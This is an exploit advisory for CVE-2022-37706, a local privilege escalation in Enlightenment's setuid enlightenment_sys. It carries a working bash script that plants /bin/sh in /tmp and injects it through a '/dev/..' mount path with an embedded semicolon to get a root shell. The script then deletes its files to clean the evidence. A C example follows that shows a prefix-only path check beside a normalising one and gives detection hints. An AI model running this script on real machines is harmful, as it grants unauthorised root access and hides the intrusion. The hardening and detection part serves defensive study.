## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## CVE ID: CVE-2022-37706

## Description:
Enlightenment version 0.25.3 is vulnerable to local privilege escalation. enlightenment_sys in Enlightenment before 0.25.3 allows local users to gain privileges because it is setuid root and the system library function mishandles pathnames that begin with a `/dev/..` substring. An attacker with local access to a machine on which Enlightenment is installed can use this vulnerability to obtain root.

## STATUS: CRITICAL Vulnerability

## Tested on:

```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```

[+] Exploit:

```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take a few seconds..."

# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)

if [[ -z ${file} ]]
then
  echo "[-] Couldn't find the vulnerable SUID file..."
  echo "[*] Enlightenment should be installed on your system."
  exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"

mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit

echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

read -p "Press any key to clean the evidence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)

## Proof and Exploit:
[href](https://streamable.com/zflbgg)

## Time spent
01:00:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/

nu11secur1ty <http://nu11secur1ty.com/>
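The root cause named in the description is a pathname check that only looks at the leading `/dev/` text, which a `/dev/..` component walks straight out of. The C program below is an added example, not code from this advisory or from the Enlightenment project, and its function names (`dev_path_prefix_only`, `dev_path_normalized`, `normalize_path`, `normalizes_to`) are hypothetical. It contrasts a prefix-only check with one that lexically normalises `.` and `..` components before comparing, using the same path shape the script above passes to `mount` as its test input.

```c
#include <stdio.h>
#include <string.h>

/* Added example: compares a prefix-only "/dev/" check with a check that
 * normalises the path first. Function names are hypothetical and do not
 * reproduce the real enlightenment_sys source. */

#define MAX_COMPONENTS 64
#define MAX_COMPONENT_LEN 256

/* Naive check: accepts anything that merely starts with "/dev/",
 * including "/dev/../tmp/..." which really points outside /dev. */
int dev_path_prefix_only(const char *path)
{
    return strncmp(path, "/dev/", 5) == 0;
}

/* Lexically normalise an absolute PATH into OUT: collapse repeated
 * slashes, drop "." components, and let ".." pop the previous one.
 * Returns 0 on success, -1 if PATH is not absolute or is too long. */
int normalize_path(const char *path, char *out, size_t outlen)
{
    char comps[MAX_COMPONENTS][MAX_COMPONENT_LEN];
    int n = 0;
    const char *p = path;

    if (path[0] != '/' || outlen < 2)
        return -1;

    while (*p) {
        while (*p == '/')            /* skip one or more separators */
            p++;
        if (!*p)
            break;
        const char *start = p;
        while (*p && *p != '/')
            p++;
        size_t len = (size_t)(p - start);
        if (len >= MAX_COMPONENT_LEN)
            return -1;
        if (len == 1 && start[0] == '.')
            continue;                /* "." adds nothing */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (n > 0)
                n--;                 /* ".." above root stays at root */
            continue;
        }
        if (n >= MAX_COMPONENTS)
            return -1;
        memcpy(comps[n], start, len);
        comps[n][len] = '\0';
        n++;
    }

    /* Rebuild "/a/b/c", or "/" when nothing is left. */
    if (n == 0) {
        strcpy(out, "/");
        return 0;
    }
    size_t used = 0;
    out[0] = '\0';
    for (int i = 0; i < n; i++) {
        size_t clen = strlen(comps[i]);
        if (used + 1 + clen + 1 > outlen)
            return -1;
        out[used++] = '/';
        memcpy(out + used, comps[i], clen);
        used += clen;
        out[used] = '\0';
    }
    return 0;
}

/* Hardened check: normalise first, then require an entry strictly below
 * /dev. Symlinks are not resolved here; a production check would also
 * call realpath(3) on the existing path before comparing. */
int dev_path_normalized(const char *path)
{
    char buf[4096];
    if (normalize_path(path, buf, sizeof buf) != 0)
        return 0;
    return strncmp(buf, "/dev/", 5) == 0 && buf[5] != '\0';
}

/* Helper: 1 if PATH normalises to EXPECTED, 0 otherwise. */
int normalizes_to(const char *path, const char *expected)
{
    char buf[4096];
    if (normalize_path(path, buf, sizeof buf) != 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

int main(void)
{
    /* Constructed samples; the second has the shape used by the script above. */
    const char *samples[] = {
        "/dev/sda1",
        "/dev/../tmp/;/tmp/exploit",
        "/dev//./sda1",
        "/tmp/evil",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-28s prefix-only=%d normalized=%d\n", samples[i],
               dev_path_prefix_only(samples[i]),
               dev_path_normalized(samples[i]));
    return 0;
}
```

The prefix-only check passes `/dev/../tmp/;/tmp/exploit`, while the normalised check rejects it because the path collapses to `/tmp/;/tmp/exploit`. Lexical normalisation alone does not defeat a symlink placed under `/dev`, so a setuid helper should canonicalise with `realpath(3)` after the path is known to exist and then re-check the prefix. For detection, the interesting signal is the setuid `enlightenment_sys` executing `mount` with a source argument containing `/dev/..`, which execve auditing (for example auditd rules on the binary) makes visible.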